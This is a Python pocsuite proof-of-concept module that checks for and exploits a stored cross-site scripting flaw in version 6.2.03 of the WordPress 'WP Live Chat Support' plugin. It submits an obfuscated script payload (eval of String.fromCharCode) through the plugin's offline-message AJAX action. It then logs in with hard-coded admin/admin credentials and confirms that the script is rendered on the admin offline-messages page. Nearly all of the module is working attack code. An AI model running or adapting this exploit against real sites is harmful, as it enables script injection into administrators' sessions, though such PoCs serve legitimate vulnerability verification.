#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
from pocsuite.api.utils import randomStr
import urllib
import re
class TestPOC(POCBase):
    """pocsuite PoC for a stored XSS in the WordPress "WP Live Chat Support" plugin (6.2.03).

    Flow (see ``_verify``): an offline-message is submitted through
    ``admin-ajax.php`` carrying a script marker, then the offline-messages
    admin page is fetched with a logged-in session and searched for that
    marker.  Both steps use the pocsuite ``req`` client; no response status
    codes are checked anywhere in this class.

    NOTE(review): the module uses Python 2 APIs (``urllib.urlencode``,
    ``str`` response bodies) and so is not Python 3 compatible as written.
    """
    name = 'WordPress WP Live Chat Support(6.2.03) 插件存储型 XSS'
    vulID = '00000' # ssvid-undefine
    author = ['soho']
    vulType = 'Cross Site Scripting'
    version = '1.0' # default version: 1.0
    references = ['https://www.exploit-db.com/exploits/40190/']
    desc = '''
后台代码未对用户输入进行有效的过滤和净化,导致漏洞存在。利用该漏洞需要一个精心构造
的 POST 请求,被攻击者登录 WordPress 后台查看离线消息时触发恶意代码。
'''
    vulDate = '2016-08-01'
    createDate = '2016-08-02'
    updateDate = '2016-08-02'
    appName = 'WordPress WP Live Chat Support'
    appVersion = '6.2.03'
    appPowerLink = 'https://wordpress.org/plugins/wp-live-chat-support/'
    samples = ['http://pan.baidu.com/s/1kVDBg9L']

    def _attack(self):
        '''Attack mode.

        Identical to verify mode: the check itself is the only action this
        PoC performs, so both entry points share ``_verify``.
        '''
        return self._verify()

    def _verify(self):
        '''Verify mode.

        Returns the ``Output`` built by ``parse_output`` on success.
        Raises a bare ``Exception`` when the marker is not found on the
        offline-messages page (pocsuite reports that as a failed check).
        '''
        # Overwritten unconditionally below (L60-style reassignment); kept as-is.
        result = {}
        # Step 1: submit an offline message containing the marker script.
        post_path = '/wp-admin/admin-ajax.php'
        url_post = '{0}{1}'.format(self.url, post_path)
        token = randomStr()
        # Turn the random string into its comma-separated character codes
        # (str(tuple(...)) gives "(97, 98, ...)"; [1:-1] strips the parens),
        # so the marker survives as a String.fromCharCode(...) argument list.
        token = str(tuple(map(ord, token)))[1:-1]
        # The fixed codes 97..34 decode to 'alert("' and 34, 41, 59 to '");',
        # so the stored script is alert("<random token>");
        payload = '<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, '\
            '{0}, 34, 41, 59));</script>'.format(token)
        post_data = {
            'name': 'NameXSS{0}'.format(payload),
            'msg': 'MsgXSS{0}'.format(payload),
            'action': 'wplc_user_send_offline_message',
            # NOTE(review): hard-coded WP nonce taken from the sample install.
            # WordPress nonces are per-site and time-limited, so this value
            # is not expected to be valid elsewhere; results may be unreliable.
            'security': '6d0836b67f',
            'email': '[email protected]'
        }
        # Response is not inspected; success is judged solely by step 2.
        r = req.post(url_post, data=post_data)
        # Step 2: log in and read the offline-messages admin page.
        # NOTE(review): credentials are hard-coded (admin/admin), i.e. the
        # check only works against the bundled sample environment.
        url_wp_login = '{0}/wp-login.php'.format(self.url)
        s = req.Session()
        # Initial GET so the session holds WordPress' test cookie before login.
        s.get(url_wp_login)
        authdata = {'pwd': 'admin', 'log': 'admin'}
        s.post(url_wp_login, data=authdata)
        verify_path = '/wp-admin/admin.php?page=wplivechat-menu-offline-messages'
        url_verify = '{0}{1}'.format(self.url, verify_path)
        r = s.get(url_verify)
        # Marker present in the rendered page => the submitted script was
        # stored and echoed unescaped.  (`token not in r.content` is the
        # idiomatic spelling; kept verbatim here.)
        if not token in r.content:
            raise Exception('Error: XSS failed!')
        # Verification passed: assemble the report.
        result = {'VerifyInfo': {}, 'XSSInfo': {}}
        result['VerifyInfo']['URL'] = self.url
        # Python 2 urllib; under Python 3 this is urllib.parse.urlencode.
        result['VerifyInfo']['Postdata'] = urllib.urlencode(post_data)
        result['XSSInfo']['URL'] = self.url
        result['XSSInfo']['Payload'] = payload
        result['XSSInfo']['InjectionPath'] = post_path
        result['XSSInfo']['VerifyPath'] = verify_path
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in a pocsuite ``Output``.

        A truthy ``result`` is reported via ``Output.success``; anything
        falsy is reported as a failure with a fixed message.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
# Module-level side effect: make the PoC discoverable by the pocsuite loader.
register(TestPOC)